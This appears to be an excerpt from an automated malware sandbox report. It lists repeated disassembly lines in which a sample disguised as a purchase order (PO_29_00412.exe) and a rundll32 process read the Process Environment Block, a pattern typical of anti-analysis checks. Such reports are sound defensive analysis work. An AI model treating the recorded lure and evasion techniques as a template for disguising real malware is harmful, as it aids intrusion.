          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8AE73 mov eax, dword ptr fs:[00000030h]1_2_00A8AE73
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A77E41 mov eax, dword ptr fs:[00000030h]1_2_00A77E41
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]1_2_00B2AE44
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B2AE44 mov eax, dword ptr fs:[00000030h]1_2_00B2AE44
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A78794 mov eax, dword ptr fs:[00000030h]1_2_00A78794
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AE7794 mov eax, dword ptr fs:[00000030h]1_2_00AE7794
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AA37F5 mov eax, dword ptr fs:[00000030h]1_2_00AA37F5
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]1_2_00A64F2E
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A64F2E mov eax, dword ptr fs:[00000030h]1_2_00A64F2E
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9E730 mov eax, dword ptr fs:[00000030h]1_2_00A9E730
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]1_2_00A9A70E
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A9A70E mov eax, dword ptr fs:[00000030h]1_2_00A9A70E
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]1_2_00B3070D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B3070D mov eax, dword ptr fs:[00000030h]1_2_00B3070D
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A8F716 mov eax, dword ptr fs:[00000030h]1_2_00A8F716
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]1_2_00AFFF10
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00AFFF10 mov eax, dword ptr fs:[00000030h]1_2_00AFFF10
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7FF60 mov eax, dword ptr fs:[00000030h]1_2_00A7FF60
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00B38F6A mov eax, dword ptr fs:[00000030h]1_2_00B38F6A
          Source: C:\Users\user\Desktop\PO_29_00412.exeCode function: 1_2_00A7EF40 mov eax, dword ptr fs:[00000030h]1_2_00A7EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462746D mov eax, dword ptr fs:[00000030h]7_2_0462746D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463A44B mov eax, dword ptr fs:[00000030h]7_2_0463A44B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469C450 mov eax, dword ptr fs:[00000030h]7_2_0469C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469C450 mov eax, dword ptr fs:[00000030h]7_2_0469C450
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463BC2C mov eax, dword ptr fs:[00000030h]7_2_0463BC2C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D740D mov eax, dword ptr fs:[00000030h]7_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D740D mov eax, dword ptr fs:[00000030h]7_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D740D mov eax, dword ptr fs:[00000030h]7_2_046D740D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686C0A mov eax, dword ptr fs:[00000030h]7_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686C0A mov eax, dword ptr fs:[00000030h]7_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686C0A mov eax, dword ptr fs:[00000030h]7_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686C0A mov eax, dword ptr fs:[00000030h]7_2_04686C0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1C06 mov eax, dword ptr fs:[00000030h]7_2_046C1C06
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C14FB mov eax, dword ptr fs:[00000030h]7_2_046C14FB
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686CF0 mov eax, dword ptr fs:[00000030h]7_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686CF0 mov eax, dword ptr fs:[00000030h]7_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686CF0 mov eax, dword ptr fs:[00000030h]7_2_04686CF0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D8CD6 mov eax, dword ptr fs:[00000030h]7_2_046D8CD6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461849B mov eax, dword ptr fs:[00000030h]7_2_0461849B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462C577 mov eax, dword ptr fs:[00000030h]7_2_0462C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462C577 mov eax, dword ptr fs:[00000030h]7_2_0462C577
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04643D43 mov eax, dword ptr fs:[00000030h]7_2_04643D43
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04683540 mov eax, dword ptr fs:[00000030h]7_2_04683540
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046B3D40 mov eax, dword ptr fs:[00000030h]7_2_046B3D40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04627D50 mov eax, dword ptr fs:[00000030h]7_2_04627D50
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460AD30 mov eax, dword ptr fs:[00000030h]7_2_0460AD30
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04613D34 mov eax, dword ptr fs:[00000030h]7_2_04613D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CE539 mov eax, dword ptr fs:[00000030h]7_2_046CE539
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04634D3B mov eax, dword ptr fs:[00000030h]7_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04634D3B mov eax, dword ptr fs:[00000030h]7_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04634D3B mov eax, dword ptr fs:[00000030h]7_2_04634D3B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D8D34 mov eax, dword ptr fs:[00000030h]7_2_046D8D34
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0468A537 mov eax, dword ptr fs:[00000030h]7_2_0468A537
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461D5E0 mov eax, dword ptr fs:[00000030h]7_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461D5E0 mov eax, dword ptr fs:[00000030h]7_2_0461D5E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CFDE2 mov eax, dword ptr fs:[00000030h]7_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CFDE2 mov eax, dword ptr fs:[00000030h]7_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CFDE2 mov eax, dword ptr fs:[00000030h]7_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CFDE2 mov eax, dword ptr fs:[00000030h]7_2_046CFDE2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046B8DF1 mov eax, dword ptr fs:[00000030h]7_2_046B8DF1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686DC9 mov eax, dword ptr fs:[00000030h]7_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686DC9 mov eax, dword ptr fs:[00000030h]7_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686DC9 mov eax, dword ptr fs:[00000030h]7_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686DC9 mov ecx, dword ptr fs:[00000030h]7_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686DC9 mov eax, dword ptr fs:[00000030h]7_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04686DC9 mov eax, dword ptr fs:[00000030h]7_2_04686DC9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D05AC mov eax, dword ptr fs:[00000030h]7_2_046D05AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D05AC mov eax, dword ptr fs:[00000030h]7_2_046D05AC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046335A1 mov eax, dword ptr fs:[00000030h]7_2_046335A1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04631DB5 mov eax, dword ptr fs:[00000030h]7_2_04631DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04631DB5 mov eax, dword ptr fs:[00000030h]7_2_04631DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04631DB5 mov eax, dword ptr fs:[00000030h]7_2_04631DB5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04632581 mov eax, dword ptr fs:[00000030h]7_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04632581 mov eax, dword ptr fs:[00000030h]7_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04632581 mov eax, dword ptr fs:[00000030h]7_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04632581 mov eax, dword ptr fs:[00000030h]7_2_04632581
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04602D8A mov eax, dword ptr fs:[00000030h]7_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04602D8A mov eax, dword ptr fs:[00000030h]7_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04602D8A mov eax, dword ptr fs:[00000030h]7_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04602D8A mov eax, dword ptr fs:[00000030h]7_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04602D8A mov eax, dword ptr fs:[00000030h]7_2_04602D8A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463FD9B mov eax, dword ptr fs:[00000030h]7_2_0463FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463FD9B mov eax, dword ptr fs:[00000030h]7_2_0463FD9B
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461766D mov eax, dword ptr fs:[00000030h]7_2_0461766D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462AE73 mov eax, dword ptr fs:[00000030h]7_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462AE73 mov eax, dword ptr fs:[00000030h]7_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462AE73 mov eax, dword ptr fs:[00000030h]7_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462AE73 mov eax, dword ptr fs:[00000030h]7_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462AE73 mov eax, dword ptr fs:[00000030h]7_2_0462AE73
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04617E41 mov eax, dword ptr fs:[00000030h]7_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04617E41 mov eax, dword ptr fs:[00000030h]7_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04617E41 mov eax, dword ptr fs:[00000030h]7_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04617E41 mov eax, dword ptr fs:[00000030h]7_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04617E41 mov eax, dword ptr fs:[00000030h]7_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04617E41 mov eax, dword ptr fs:[00000030h]7_2_04617E41
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CAE44 mov eax, dword ptr fs:[00000030h]7_2_046CAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046CAE44 mov eax, dword ptr fs:[00000030h]7_2_046CAE44
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460E620 mov eax, dword ptr fs:[00000030h]7_2_0460E620
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046BFE3F mov eax, dword ptr fs:[00000030h]7_2_046BFE3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460C600 mov eax, dword ptr fs:[00000030h]7_2_0460C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460C600 mov eax, dword ptr fs:[00000030h]7_2_0460C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460C600 mov eax, dword ptr fs:[00000030h]7_2_0460C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04638E00 mov eax, dword ptr fs:[00000030h]7_2_04638E00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C1608 mov eax, dword ptr fs:[00000030h]7_2_046C1608
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463A61C mov eax, dword ptr fs:[00000030h]7_2_0463A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463A61C mov eax, dword ptr fs:[00000030h]7_2_0463A61C
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046316E0 mov ecx, dword ptr fs:[00000030h]7_2_046316E0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046176E2 mov eax, dword ptr fs:[00000030h]7_2_046176E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04648EC7 mov eax, dword ptr fs:[00000030h]7_2_04648EC7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046BFEC0 mov eax, dword ptr fs:[00000030h]7_2_046BFEC0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046336CC mov eax, dword ptr fs:[00000030h]7_2_046336CC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D8ED6 mov eax, dword ptr fs:[00000030h]7_2_046D8ED6
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D0EA5 mov eax, dword ptr fs:[00000030h]7_2_046D0EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D0EA5 mov eax, dword ptr fs:[00000030h]7_2_046D0EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D0EA5 mov eax, dword ptr fs:[00000030h]7_2_046D0EA5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046846A7 mov eax, dword ptr fs:[00000030h]7_2_046846A7
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469FE87 mov eax, dword ptr fs:[00000030h]7_2_0469FE87
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461FF60 mov eax, dword ptr fs:[00000030h]7_2_0461FF60
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D8F6A mov eax, dword ptr fs:[00000030h]7_2_046D8F6A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461EF40 mov eax, dword ptr fs:[00000030h]7_2_0461EF40
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04604F2E mov eax, dword ptr fs:[00000030h]7_2_04604F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04604F2E mov eax, dword ptr fs:[00000030h]7_2_04604F2E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463E730 mov eax, dword ptr fs:[00000030h]7_2_0463E730
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D070D mov eax, dword ptr fs:[00000030h]7_2_046D070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D070D mov eax, dword ptr fs:[00000030h]7_2_046D070D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463A70E mov eax, dword ptr fs:[00000030h]7_2_0463A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463A70E mov eax, dword ptr fs:[00000030h]7_2_0463A70E
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462F716 mov eax, dword ptr fs:[00000030h]7_2_0462F716
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469FF10 mov eax, dword ptr fs:[00000030h]7_2_0469FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469FF10 mov eax, dword ptr fs:[00000030h]7_2_0469FF10
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046437F5 mov eax, dword ptr fs:[00000030h]7_2_046437F5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04618794 mov eax, dword ptr fs:[00000030h]7_2_04618794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04687794 mov eax, dword ptr fs:[00000030h]7_2_04687794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04687794 mov eax, dword ptr fs:[00000030h]7_2_04687794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04687794 mov eax, dword ptr fs:[00000030h]7_2_04687794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D1074 mov eax, dword ptr fs:[00000030h]7_2_046D1074
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046C2073 mov eax, dword ptr fs:[00000030h]7_2_046C2073
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04620050 mov eax, dword ptr fs:[00000030h]7_2_04620050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04620050 mov eax, dword ptr fs:[00000030h]7_2_04620050
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461B02A mov eax, dword ptr fs:[00000030h]7_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461B02A mov eax, dword ptr fs:[00000030h]7_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461B02A mov eax, dword ptr fs:[00000030h]7_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0461B02A mov eax, dword ptr fs:[00000030h]7_2_0461B02A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463002D mov eax, dword ptr fs:[00000030h]7_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463002D mov eax, dword ptr fs:[00000030h]7_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463002D mov eax, dword ptr fs:[00000030h]7_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463002D mov eax, dword ptr fs:[00000030h]7_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463002D mov eax, dword ptr fs:[00000030h]7_2_0463002D
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D4015 mov eax, dword ptr fs:[00000030h]7_2_046D4015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046D4015 mov eax, dword ptr fs:[00000030h]7_2_046D4015
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04687016 mov eax, dword ptr fs:[00000030h]7_2_04687016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04687016 mov eax, dword ptr fs:[00000030h]7_2_04687016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04687016 mov eax, dword ptr fs:[00000030h]7_2_04687016
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046040E1 mov eax, dword ptr fs:[00000030h]7_2_046040E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046040E1 mov eax, dword ptr fs:[00000030h]7_2_046040E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046040E1 mov eax, dword ptr fs:[00000030h]7_2_046040E1
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046058EC mov eax, dword ptr fs:[00000030h]7_2_046058EC
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469B8D0 mov eax, dword ptr fs:[00000030h]7_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469B8D0 mov ecx, dword ptr fs:[00000030h]7_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469B8D0 mov eax, dword ptr fs:[00000030h]7_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469B8D0 mov eax, dword ptr fs:[00000030h]7_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469B8D0 mov eax, dword ptr fs:[00000030h]7_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0469B8D0 mov eax, dword ptr fs:[00000030h]7_2_0469B8D0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046320A0 mov eax, dword ptr fs:[00000030h]7_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046320A0 mov eax, dword ptr fs:[00000030h]7_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046320A0 mov eax, dword ptr fs:[00000030h]7_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046320A0 mov eax, dword ptr fs:[00000030h]7_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046320A0 mov eax, dword ptr fs:[00000030h]7_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046320A0 mov eax, dword ptr fs:[00000030h]7_2_046320A0
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_046490AF mov eax, dword ptr fs:[00000030h]7_2_046490AF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463F0BF mov ecx, dword ptr fs:[00000030h]7_2_0463F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463F0BF mov eax, dword ptr fs:[00000030h]7_2_0463F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0463F0BF mov eax, dword ptr fs:[00000030h]7_2_0463F0BF
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04609080 mov eax, dword ptr fs:[00000030h]7_2_04609080
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04683884 mov eax, dword ptr fs:[00000030h]7_2_04683884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04683884 mov eax, dword ptr fs:[00000030h]7_2_04683884
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460C962 mov eax, dword ptr fs:[00000030h]7_2_0460C962
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460B171 mov eax, dword ptr fs:[00000030h]7_2_0460B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0460B171 mov eax, dword ptr fs:[00000030h]7_2_0460B171
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462B944 mov eax, dword ptr fs:[00000030h]7_2_0462B944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0462B944 mov eax, dword ptr fs:[00000030h]7_2_0462B944
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04624120 mov eax, dword ptr fs:[00000030h]7_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04624120 mov eax, dword ptr fs:[00000030h]7_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04624120 mov eax, dword ptr fs:[00000030h]7_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04624120 mov eax, dword ptr fs:[00000030h]7_2_04624120
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_04624120 mov ecx, dword ptr fs:[00000030h]7_2_04624120
